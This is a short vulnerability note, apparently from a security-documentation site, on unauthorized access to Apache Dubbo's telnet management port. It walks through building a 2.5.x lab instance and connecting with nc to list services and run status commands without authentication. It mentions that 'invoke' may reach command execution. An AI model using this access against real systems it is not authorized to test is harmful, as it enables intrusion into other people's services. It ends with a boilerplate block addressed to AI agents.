# Dubbo Unauthorized Access Vulnerability ## Introduction to the vulnerability Dubbo is an open source, high-performance service framework developed by Alibaba Inc. that enables applications to perform input and output functions via high-performance RPC, and can seamlessly integrate with the Spring framework. Dubbo has an unauthorized access vulnerability due to improper configuration. ## Environment setup ``` git clone https://github.com/alibaba/dubbo/tree/2.5.x ``` Enter the `dubbo-2.5.x` directory Execute `mvn clean package -Dmaven.test.skip=true`, and the following results will be generated: ![image-20220726153013824](/files/RXkvKyPFV81wZde1iK4D) In the `dubbo-2.5.x/dubbo-simple/dubbo-monitor-simple/target` directory, you will find `dubbo-monitor-simple-2.5.10-assembly.tar.gz` generated, extract this folder. Check the configuration file, and you will see that the dubbo protocol port is 7070. ``` [root@localhost dubbo-monitor-simple-2.5.10]# cat conf/dubbo.properties dubbo.container=log4j,spring,registry,jetty dubbo.application.name=simple-monitor dubbo.application.owner= dubbo.registry.address=multicast://224.5.6.7:1234 #dubbo.registry.address=zookeeper://127.0.0.1:2181 #dubbo.registry.address=redis://127.0.0.1:6379 #dubbo.registry.address=dubbo://127.0.0.1:9090 dubbo.protocol.port=7070 dubbo.jetty.port=8080 dubbo.jetty.directory=${user.home}/monitor dubbo.charts.directory=${dubbo.jetty.directory}/charts dubbo.statistics.directory=${user.home}/monitor/statistics dubbo.log4j.file=logs/dubbo-monitor-simple.log ``` Start Dubbo ``` [root@localhost dubbo-monitor-simple-2.5.10]# bin/start.sh ``` ## Vulnerability exploitation Connect to port 7070 with `nc`, port 7070 allows you to perform various management tasks, such as checking the status of the registry, listing available services, and viewing the log level of the registry. ``` [root@localhost dubbo-monitor-simple-2.5.10]# nc 127.0.0.1 7070 ls com.alibaba.dubbo.monitor.MonitorService dubbo>help Please input "help [command]" show detail. status [-l] - Show status. pwd - Print working default service. trace [service] [method] [times] - Trace the service. exit - Exit the telnet. help [command] - Show help. invoke [service.]method(args) - Invoke the service method. count [service] [method] [times] - Count the service. clear [lines] - Clear screen. ls [-l] [service] - List services and methods. log level - Change log level or show log ps [-l] [port] - Print server ports and connections. cd [service] - Change default service. dubbo>status OK dubbo>pwd / ``` > If the service has command execution capability, the "invoke" command may execute commands as the "invoke" command is used to invoke specific service methods. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://icybersec.gitbook.io/cybersecuritynote-en/security-vulnerability/unauthorized-vulnerability/dubbo-unauthorized-access-vulnerability.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.